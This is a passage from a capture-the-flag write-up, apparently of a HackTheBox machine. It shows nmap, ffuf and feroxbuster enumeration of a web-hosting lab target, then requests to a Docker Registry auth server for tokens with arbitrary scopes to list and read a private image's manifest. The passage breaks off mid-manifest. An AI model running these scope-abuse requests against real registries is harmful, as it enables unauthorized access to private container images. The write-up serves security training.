SF:nd\n")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(LDAPSearchReq,67,"HTTP/1\.1\x20400\x20Bad\x20Requ
SF:est\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20
SF:close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.65 seconds
Based on the OpenSSH version, the host is likely running Ubuntu 18.04 bionic. Port 443 is redirecting to www.webhosting.htb
. Port 5000 seems like Docker Registry. Port 5001 is something under TLS and HTTP.
The site is clearly using virtual host routing, so I’ll fuzz for additional subdomains that respond differently from the default case (which seems to be a redirect to www.webhosting.htb
). On port 443, it only finds www:
oxdf@hacky$ ffuf -u https://10.10.11.223 -H "Host: FUZZ.webhosting.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : https://10.10.11.223
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.webhosting.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
________________________________________________
www [Status: 200, Size: 23978, Words: 9500, Lines: 670, Duration: 107ms]
:: Progress: [19966/19966] :: Job [1/1] :: 366 req/sec :: Duration: [0:00:55] :: Errors: 0 ::
There’s a lot of fuzzing I should do from here (trying each web service, subdomains of www.webhosting.htb
), but none of them will find anything interesting.
The site is for a web hosting company:
There’s an email on this page (contact@www.webhosting.htb
), but otherwise not much interesting. The “About” page (about.html
) is similar.
The Login and Register forms are similar, and located at /hosting/auth/signin
and /hosting/auth/signup
respectively. I’ll sign up:
On logging, I’m redirected to /hosting/panel
, where I get a panel to control my domains:
I can create a domain:
And then it gives an index.html
and allows me to add and modify files in the space:
If I click the “Open” button it opens https://www.static-[domain id].webhosting.htb/
. Once I update my /etc/hosts
file, this shows the page:
I’ll look at how the webserver is configured to support dynamic domains like this in Beyond Root.
There’s a profile page (/hosting/profile
) that allows me to update my info and see my domains:
The initial site seems like static HTML. There’s only index.html
and about.html
, and nothing else of interesting. Once I get into /hosting
, it behaves differently. On first visiting the signin or signup pages, it sets a JSESSIONID
cookie:
HTTP/1.1 200
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 26 Jan 2024 20:33:04 GMT
Content-Length: 3781
Connection: keep-alive
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Set-Cookie: JSESSIONID=E516DEADF142235D2BEC0D1D5B538F21; Path=/; HttpOnly
This suggests this is a Java application.
I’ll also note a difference in the 404 responses when visiting a non-existent page on the root of the site vs one in the /hosting
folder. /0xdf
returns the nginx 404 page:
/hosting/0xdf
returns a 302 redirect to /hosting/auth/signin
. From this, it seems likely that nginx is handling the root, but forwarding anything in /hosting
to a Java application.
The TLS certificate for the site shows no DNS name or subject alternative names, just the contact email:
I’ll run feroxbuster
against the site. I’m not going to bother with checking the .html
extension (though I might in the background later) as it adds a lot of requests and not much potential value:
oxdf@hacky$ feroxbuster -u https://www.webhosting.htb -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.3
───────────────────────────┬──────────────────────
🎯 Target Url │ https://www.webhosting.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 7l 13w 178c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 7l 13w 194c https://www.webhosting.htb/js => https://www.webhosting.htb/js/
301 GET 7l 13w 194c https://www.webhosting.htb/images => https://www.webhosting.htb/images/
301 GET 7l 13w 194c https://www.webhosting.htb/css => https://www.webhosting.htb/css/
200 GET 669l 1715w 23978c https://www.webhosting.htb/
301 GET 7l 13w 194c https://www.webhosting.htb/hosting => https://www.webhosting.htb/hosting/
302 GET 0l 0w 0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 39l 110w 1544c https://www.webhosting.htb/hosting/META-INF
404 GET 39l 110w 1544c https://www.webhosting.htb/hosting/WEB-INF
404 GET 39l 110w 1544c https://www.webhosting.htb/hosting/web-inf
[####################] - 1m 150000/150000 0s found:8 errors:0
[####################] - 1m 30000/30000 296/s https://www.webhosting.htb/
[####################] - 1m 30000/30000 300/s https://www.webhosting.htb/js/
[####################] - 1m 30000/30000 300/s https://www.webhosting.htb/images/
[####################] - 1m 30000/30000 300/s https://www.webhosting.htb/css/
[####################] - 1m 30000/30000 265/s https://www.webhosting.htb/hosting/
I’ll note the META-INF
and WEB-INF
directories. They both return 404, but a different 404 than the default that’s being filtered.
I run feroxbuster
in the mode where it smart filters. I’ll also note that feroxbuster
adds another default filter after it starts in /hosting
.
Nothing else too interesting here.
The TLS certificate on port 5000 and 5001 is for *.webhosting.htb
as well as the DNS name webhosting.htb
:
Visiting https://10.10.11.223:5000
returns an empty page. nmap
said it was Docker Registry. The HackTricks page 5000 - Pentesting Docker Registry has this list to identify Docker Registry:
I’ll try /v2/
, but I get a 401 Unauthorized response:
HTTP/1.1 401 Unauthorized
Content-Type: application/json; charset=utf-8
Docker-Distribution-Api-Version: registry/2.0
Www-Authenticate: Bearer realm="https://webhosting.htb:5001/auth",service="Docker registry"
X-Content-Type-Options: nosniff
Date: Fri, 26 Jan 2024 21:55:14 GMT
Content-Length: 87
{
"errors": [{
"code": "UNAUTHORIZED",
"message": "authentication required",
"detail": null
}]
}
I’ll note the Www-Authenticate
header shows that https://webhosting.htb:5001/auth
is the authentication service for this service, and the service
name is “Docker registry” (case matters). Given that it’s using the domain webhosting.htb
(without “www”), I’ll start using that as well.
Visiting this page returns:
I can directory brute force to find /auth
, or look at the headers above. Either way,it returns two tokens:
Those are JWT tokens, and they are the same. If I decode the middle block (the first is the header and the last is the signature), I’ll get:
oxdf@hacky$ echo "eyJpc3MiOiJBY21lIGF1dGggc2VydmVyIiwic3ViIjoiIiwiYXVkIjoiIiwiZXhwIjoxNzA2MzA3MTg0LCJuYmYiOjE3MDYzMDYyNzQsImlhdCI6MTcwNjMwNjI4NCwianRpIjoiMTI0MjY1MjUyMTU1MDA4MTM5OSIsImFjY2VzcyI6W119" | base64 -d | jq .
{
"iss": "Acme auth server",
"sub": "",
"aud": "",
"exp": 1706307184,
"nbf": 1706306274,
"iat": 1706306284,
"jti": "1242652521550081399",
"access": []
}
That lines up nicely with the Token Authentication Implementation article on the Docker Registry documentation.
To use the token, the page above says to send it in an Authorization: Bearer [token]
header. If I send that token, it still fails:
oxdf@hacky$ curl -k 'https://webhosting.htb:5000/v2/' -H 'Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6IlFYNjY6MkUyQTpZT0xPOjdQQTM6UEdRSDpHUVVCOjVTQk06UlhSMjpUSkM0OjVMNFg6TVVZSjpGSEVWIn0.eyJpc3MiOiJBY21lIGF1dGggc2VydmVyIiwic3ViIjoiIiwiYXVkIjoiIiwiZXhwIjoxNzA2MzA3MTg0LCJuYmYiOjE3MDYzMDYyNzQsImlhdCI6MTcwNjMwNjI4NCwianRpIjoiMTI0MjY1MjUyMTU1MDA4MTM5OSIsImFjY2VzcyI6W119.RlbOC_S7c6odwcMCSK83N6ZnznWm-8S7sm9pH-8yNPQfKedhbQtcgWuu72WPRQ4l11B1HwpalgqAZSFf5nepZXYgoqIanzRwi9rU4WgzXmDqMVBvD9-mXZGkC1f_203hJB7xIokDR8MkuJBNEbD4ICgcDbYOkHRmzedenrop7ZyLiEFm2xsG3amds8ioaMkobv1oI1mkl1ZvT93Mj2MzPcgaDG4zbg5z-a7ChgUQH4O5ZjxPeplkLeErezzWj-T-ELFreik_vws11eDToK7Fgla0_VLxi6ER_16H_gQLYiVw23R4cCQ4faIbGN0ebBm7LzLmYKdq45b7KSL2jPmzhw'
{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":null}]}
That’s because there’s no access in that token.
The token auth docs show requesting a token from the following URL:
/token?service=registry.docker.io&scope=repository:samalba/my-app:pull,push
That seems like a way to request different privileges. The 401 gave a URL of /auth
rather than /token
. The service
must be “Docker registry” as shown in the header above. For the scope
, this GitHub issue shows that registry:catalog:*
is a way to request the catalog. I’ll try that:
oxdf@hacky$ curl -k 'https://webhosting.htb:5001/auth?service=Docker+registry&scope=registry:catalog:*'
{"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6IlFYNjY6MkUyQTpZT0xPOjdQQTM6UEdRSDpHUVVCOjVTQk06UlhSMjpUSkM0OjVMNFg6TVVZSjpGSEVWIn0.eyJpc3MiOiJBY21lIGF1dGggc2VydmVyIiwic3ViIjoiIiwiYXVkIjoiRG9ja2VyIHJlZ2lzdHJ5IiwiZXhwIjoxNzA2MzA4Nzg4LCJuYmYiOjE3MDYzMDc4NzgsImlhdCI6MTcwNjMwNzg4OCwianRpIjoiNzM5NDcwMTE1OTkxNDU0MjY4MiIsImFjY2VzcyI6W3sidHlwZSI6InJlZ2lzdHJ5IiwibmFtZSI6ImNhdGFsb2ciLCJhY3Rpb25zIjpbIioiXX1dfQ.S1ZMIuJOGo3NlXxei60L905NBBnIu70WQCGcA6EuFsiYrhGoeLWVOeLygatuniFavmnxM_-grVW3lb2NNhuVnY_eLjKQ-B57A6aNqA7tsr9RBAsFB5T3YVbHc4mNtg5OiGJWP4F-iveDpZGfAA3eWAN7oZ1m8_hogTHzkIqAZE3uM5DfFfCAICKd-DDf60vVJ1yExC50L5IxIARRSvIpRT9WI-FhrHSeP8MXBwEU5pEpd6hiPOUrHpA7VeD8idkg6eFNza6nMSZ4sZu9_Q9XqnVJQ6dB9zb4JkF39BPUxm8hA4PZXlAbV1lJT9kc35GfWO-uIrn0aiiv_3lPk0eCkw","token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6IlFYNjY6MkUyQTpZT0xPOjdQQTM6UEdRSDpHUVVCOjVTQk06UlhSMjpUSkM0OjVMNFg6TVVZSjpGSEVWIn0.eyJpc3MiOiJBY21lIGF1dGggc2VydmVyIiwic3ViIjoiIiwiYXVkIjoiRG9ja2VyIHJlZ2lzdHJ5IiwiZXhwIjoxNzA2MzA4Nzg4LCJuYmYiOjE3MDYzMDc4NzgsImlhdCI6MTcwNjMwNzg4OCwianRpIjoiNzM5NDcwMTE1OTkxNDU0MjY4MiIsImFjY2VzcyI6W3sidHlwZSI6InJlZ2lzdHJ5IiwibmFtZSI6ImNhdGFsb2ciLCJhY3Rpb25zIjpbIioiXX1dfQ.S1ZMIuJOGo3NlXxei60L905NBBnIu70WQCGcA6EuFsiYrhGoeLWVOeLygatuniFavmnxM_-grVW3lb2NNhuVnY_eLjKQ-B57A6aNqA7tsr9RBAsFB5T3YVbHc4mNtg5OiGJWP4F-iveDpZGfAA3eWAN7oZ1m8_hogTHzkIqAZE3uM5DfFfCAICKd-DDf60vVJ1yExC50L5IxIARRSvIpRT9WI-FhrHSeP8MXBwEU5pEpd6hiPOUrHpA7VeD8idkg6eFNza6nMSZ4sZu9_Q9XqnVJQ6dB9zb4JkF39BPUxm8hA4PZXlAbV1lJT9kc35GfWO-uIrn0aiiv_3lPk0eCkw"}
oxdf@hacky$ echo "eyJpc3MiOiJBY21lIGF1dGggc2VydmVyIiwic3ViIjoiIiwiYXVkIjoiRG9ja2VyIHJlZ2lzdHJ5IiwiZXhwIjoxNzA2MzA4Nzg4LCJuYmYiOjE3MDYzMDc4NzgsImlhdCI6MTcwNjMwNzg4OCwianRpIjoiNzM5NDcwMTE1OTkxNDU0MjY4MiIsImFjY2VzcyI6W3sidHlwZSI6InJlZ2lzdHJ5IiwibmFtZSI6ImNhdGFsb2ciLCJhY3Rpb25zIjpbIioiXX1dfQ" | base64 -d | jq .
base64: invalid input
{
"iss": "Acme auth server",
"sub": "",
"aud": "Docker registry",
"exp": 1706308788,
"nbf": 1706307878,
"iat": 1706307888,
"jti": "7394701159914542682",
"access": [
{
"type": "registry",
"name": "catalog",
"actions": [
"*"
]
}
]
}
That token seems to have full permissions on the aud
(Audience) of “Docker registry”. It works to query:
oxdf@hacky$ curl -k 'https://webhosting.htb:5000/v2/' -H 'Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6IlFYNjY6MkUyQTpZT0xPOjdQQTM6UEdRSDpHUVVCOjVTQk06UlhSMjpUSkM0OjVMNFg6TVVZSjpGSEVWIn0.eyJpc3MiOiJBY21lIGF1dGggc2VydmVyIiwic3ViIjoiIiwiYXVkIjoiRG9ja2VyIHJlZ2lzdHJ5IiwiZXhwIjoxNzA2MzA4Nzg4LCJuYmYiOjE3MDYzMDc4NzgsImlhdCI6MTcwNjMwNzg4OCwianRpIjoiNzM5NDcwMTE1OTkxNDU0MjY4MiIsImFjY2VzcyI6W3sidHlwZSI6InJlZ2lzdHJ5IiwibmFtZSI6ImNhdGFsb2ciLCJhY3Rpb25zIjpbIioiXX1dfQ.S1ZMIuJOGo3NlXxei60L905NBBnIu70WQCGcA6EuFsiYrhGoeLWVOeLygatuniFavmnxM_-grVW3lb2NNhuVnY_eLjKQ-B57A6aNqA7tsr9RBAsFB5T3YVbHc4mNtg5OiGJWP4F-iveDpZGfAA3eWAN7oZ1m8_hogTHzkIqAZE3uM5DfFfCAICKd-DDf60vVJ1yExC50L5IxIARRSvIpRT9WI-FhrHSeP8MXBwEU5pEpd6hiPOUrHpA7VeD8idkg6eFNza6nMSZ4sZu9_Q9XqnVJQ6dB9zb4JkF39BPUxm8hA4PZXlAbV1lJT9kc35GfWO-uIrn0aiiv_3lPk0eCkw'
{}
I’ll use this bash
to save the token in an env variable:
oxdf@hacky$ TOKEN=$(curl -sk 'https://webhosting.htb:5001/auth?service=Docker+registry&scope=registry:catalog:*' | jq -r .token)
oxdf@hacky$ curl -k 'https://webhosting.htb:5000/v2/' -H "Authorization: Bearer $TOKEN"
{}
/v2/_catalog
will list the catalog:
oxdf@hacky$ curl -k 'https://webhosting.htb:5000/v2/_catalog' -H "Authorization: Bearer $TOKEN"
{"repositories":["hosting-app"]}
There’s a repository named hosting-app
.
Just like I showed in Registry, I can request a tags list for the repo with /v2/[repo]/tags/list
. Unfortunately, it fails:
oxdf@hacky$ curl -k 'https://webhosting.htb:5000/v2/hosting-app/tags/list' -H "Authorization: Bearer $TOKEN"
{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"repository","Class":"","Name":"hosting-app","Action":"pull"}]}]}
It shows the action I’m trying to do as pull
. I’ll request that from the auth server:
oxdf@hacky$ TOKEN=$(curl -sk 'https://webhosting.htb:5001/auth?service=Docker+registry&scope=repository:hosting-app:pull' | jq -r .token)
oxdf@hacky$ curl -k 'https://webhosting.htb:5000/v2/hosting-app/tags/list' -H "Authorization: Bearer $TOKEN"
{"name":"hosting-app","tags":["latest"]}
There’s one tag, latest
.
The manifest contains all the layers for the image, which I can request using the /v2/[repository]/manifests/[tag]
endpoint:
oxdf@hacky$ curl -k 'https://webhosting.htb:5000/v2/hosting-app/manifests/latest' -H "Authorization: Bearer $TOKEN"
{
"schemaVersion": 1,
"name": "hosting-app",
"tag": "latest",
"architecture": "amd64",
"fsLayers": [
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:0bf45c325a696381eea5176baa1c8e84fbf0fe5e2ddf96a22422b10bf879d0ba"
},
{
"blobSum": "sha256:4a19a05f49c2d93e67d7c9ea8ba6c310d6b358e811c8ae37787f21b9ad82ac42"
},
{
"blobSum": "sha256:9e700b74cc5b6f81ed6513fa03c7b6ab11a71deb8e27604632f723f81aca3268"
},
{
"blobSum": "sha256:b5ac54f57d23fa33610cb14f7c21c71aa810e58884090cead5e3119774a202dc"
},
{
"blobSum": "sha256:396c4a40448860471ae66f68c261b9a0ed277822b197730ba89cb50528f042c7"
},
{
"blobSum": "sha256:9d5bcc17fed815c4060b373b2a8595687502925829359dc244dd4cdff777a96c"
},
{
"blobSum": "sha256:ab55eca3206e27506f679b41b39ba0e4c98996fa347326b6629dae9163b4c0ec"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:f7b708f947c32709ecceaffd85287d5eb9916a3013f49c8416228ef22c2bf85e"
},
{
"blobSum": "sha256:497760bf469e19f1845b7f1da9cfe7e053beb57d4908fb2dff2a01a9f82211f9"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:e4cc5f625cda9caa32eddae6ac29b170c8dc1102988b845d7ab637938f2f6f84"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:0da484dfb0612bb168b7258b27e745d0febf56d22b8f10f459ed0d1dfe345110"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:7b43ca85cb2c7ccc62e03067862d35091ee30ce83e7fed9e135b1ef1c6e2e71b"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:fa7536dd895ade2421a9a0fcf6e16485323f9e2e45e917b1ff18b0f648974626"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:5de5f69f42d765af6ffb6753242b18dd4a33602ad7d76df52064833e5c527cb4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e28"
}
],
"history": [
{
"v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"app\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"ExposedPorts\":{\"8080/tcp\":{}},\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/tomcat/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin\",\"LANG=C.UTF-8\",\"JAVA_HOME=/usr/lib/jvm/java-1.8-openjdk/jre\",\"JAVA_VERSION=8u151\",\"JAVA_ALPINE_VERSION=8.151.12-r0\",\"CATALINA_HOME=/usr/local/tomcat\",\"TOMCAT_NATIVE_LIBDIR=/usr/local/tomcat/native-jni-lib\",\"LD_LIBRARY_PATH=/usr/local/tomcat/native-jni-lib\",\"GPG_KEYS=05AB33110949707C93A279E3D3EFE6B686867BA6 07E48665A34DCAFAE522E5E6266191C37C037D42 47309207D818FFD8DCD3F83F1931D684307A10A5 541FBE7D8F78B25E055DDEE13C370389288584E7 61B832AC2F1C5A90F0F9B00A1C506407564C17A3 79F7026C690BAA50B92CD8B66A3AD3F4F22C4FED 9BA44C2621385CB966EBA586F72C284D731FABEE A27677289986DB50844682F8ACB77FC2E86E29AC A9C5DF4D22E99998D9875A5110C01C5A2F6059E7 DCFD35E0BF8CA7344752DE8B6FB21E8933C60243 F3A04C595DB5B6A5F1ECA43E3B7BBB100D811BBE F7DA48BB64BCB84ECBA7EE6935CD23C10D498E23\",\"TOMCAT_MAJOR=9\",\"TOMCAT_VERSION=9.0.2\",\"TOMCAT_SHA1=b59e1d658a4edbca7a81d12fd6f20203a4da9743\",\"TOMCAT_TGZ_URLS=https://www.apache.org/dyn/closer.cgi?action=download\\u0026filename=tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz \\thttps://www-us.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz \\thttps://www.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz \\thttps://archive.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz\",\"TOMCAT_ASC_URLS=https://www.apache.org/dyn/closer.cgi?action=download\\u0026filename=tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc \\thttps://www-us.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc \\thttps://www.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc \\thttps://archive.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc\"],\"Cmd\":[\"catalina.sh\",\"run\"],\"Image\":\"sha256:57f3a04ba3229928a30942945b0fb3c74bd61cec80cbc5a41d7d61a2d1c3ec4f\",\"Volumes\":null,\"WorkingDir\":\"/usr/local/tomcat\",\"Entrypoint\":null,\"OnBuild\":[],\"Labels\":null},\"container\":\"2f8f037b0e059fa89bc318719f991b783cd3c4b92de4a6776cc5ec3a8530d6ba\",\"container_config\":{\"Hostname\":\"2f8f037b0e05\",\"Domainname\":\"\",\"User\":\"app\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"ExposedPorts\":{\"8080/tcp\":{}},\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/tomcat/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin\",\"LANG=C.UTF-8\",\"JAVA_HOME=/usr/lib/jvm/java-1.8-openjdk/jre\",\"JAVA_VERSION=8u151\",\"JAVA_ALPINE_VERSION=8.151.12-r0\",\"CATALINA_HOME=/usr/local/tomcat\",\"TOMCAT_NATIVE_LIBDIR=/usr/local/tomcat/native-jni-lib\",\"LD_LIBRARY_PATH=/usr/local/tomcat/native-jni-lib\",\"GPG_KEYS=05AB33110949707C93A279E3D3EFE6B686867BA6 07E48665A34DCAFAE522E5E6266191C37C037D42 47309207D818FFD8DCD3F83F1931D684307A10A5 541FBE7D8F78B25E055DDEE13C370389288584E7 61B832AC2F1C5A90F0F9B00A1C506407564C17A3 79F7026C690BAA50B92CD8B66A3AD3F4F22C4FED 9BA44C2621385CB966EBA586F72C284D731FABEE A27677289986DB50844682F8ACB77FC2E86E29AC A9C5DF4D22E99998D9875A5110C01C5A2F6059E7 DCFD35E0BF8CA7344752DE8B6FB21E8933C60243 F3A04C595DB5B6A5F1ECA43E3B7BBB100D811BBE F7DA48BB64BCB84ECBA7EE6935CD23C10D498E23\",\"TOMCAT_MAJOR=9\",\"TOMCAT_VERSION=9.0.2\",\"TOMCAT_SHA1=b59e1d658a4edbca7a81d12fd6f20203a4da9743\",\"TOMCAT_TGZ_URLS=https://www.apache.org/dyn/closer.cgi?action=download\\u0026filename=tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz \\thttps://www-us.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz \\thttps://www.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz \\thttps://archive.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz\",\"TOMCAT_ASC_URLS=https://www.apache.org/dyn/closer.cgi?action=download\\u0026filename=tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc \\thttps://www-us.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc \\thttps://www.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc \\thttps://archive.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) \",\"CMD [\\\"catalina.sh\\\" \\\"run\\\"]\"],\"Image\":\"sha256:57f3a04ba3229928a30942945b0fb3c74bd61cec80cbc5a41d7d61a2d1c3ec4f\",\"Volumes\":null,\"WorkingDir\":\"/usr/local/tomcat\",\"Entrypoint\":null,\"OnBuild\":[],\"Labels\":{}},\"created\":\"2023-07-04T10:57:03.768956926Z\",\"docker_version\":\"20.10.23\",\"id\":\"1f5797acb3ce332a92212fac43141b9179f396db844876ea976828c027cc5cd2\",\"os\":\"linux\",\"parent\":\"b581fd7323f8b829979a384105c27aeff6f114f0b5e63aaa00e4090ce50df370\",\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"b581fd7323f8b829979a384105c27aeff6f114f0b5e63aaa00e4090ce50df370\",\"parent\":\"1c287aa55678a4fa6681ba16d09ce6bf798fac6640dceb43230e18a04316aee1\",\"created\":\"2023-07-04T10:57:03.500684978Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) USER app\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"1c287aa55678a4fa6681ba16d09ce6bf798fac6640dceb43230e18a04316aee1\",\"parent\":\"c5b60d48ea6e9578b52142829c5a979f0429207c7ff107f556c73b2d00230ba2\",\"created\":\"2023-07-04T10:57:03.230181852Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) COPY --chown=app:appfile:24e216b758a41629b4357c4cd3aa1676635e7f68b432edff5124a8af4b95362f in /etc/hosting.ini \"]}}"
},
{
"v1Compatibility": "{\"id\":\"c5b60d48ea6e9578b52142829c5a979f0429207c7ff107f556c73b2d00230ba2\",\"parent\":\"8352728bd14b4f5a18051ae76ce15e3d3a97180d5a699b3847d89570e37354f1\",\"created\":\"2023-07-04T10:57:02.865658784Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c chown -R app /usr/local/tomcat/\"]}}"
},
{
"v1Compatibility": "{\"id\":\"8352728bd14b4f5a18051ae76ce15e3d3a97180d5a699b3847d89570e37354f1\",\"parent\":\"a785065e8f19dad061ddf5035668d11bc69cd943634130ffd35ab8fcd9884da0\",\"created\":\"2023-07-04T10:56:56.087876543Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c adduser -S -u 1000 -G app app\"]}}"
},
{
"v1Compatibility": "{\"id\":\"a785065e8f19dad061ddf5035668d11bc69cd943634130ffd35ab8fcd9884da0\",\"parent\":\"690545aba874c1cbffa3b6cfa0b6708cffb39c97d4b823b4cef4abd0db23cce0\",\"created\":\"2023-07-04T10:56:55.215778789Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c addgroup -S -g 1000 app\"]}}"
},
{
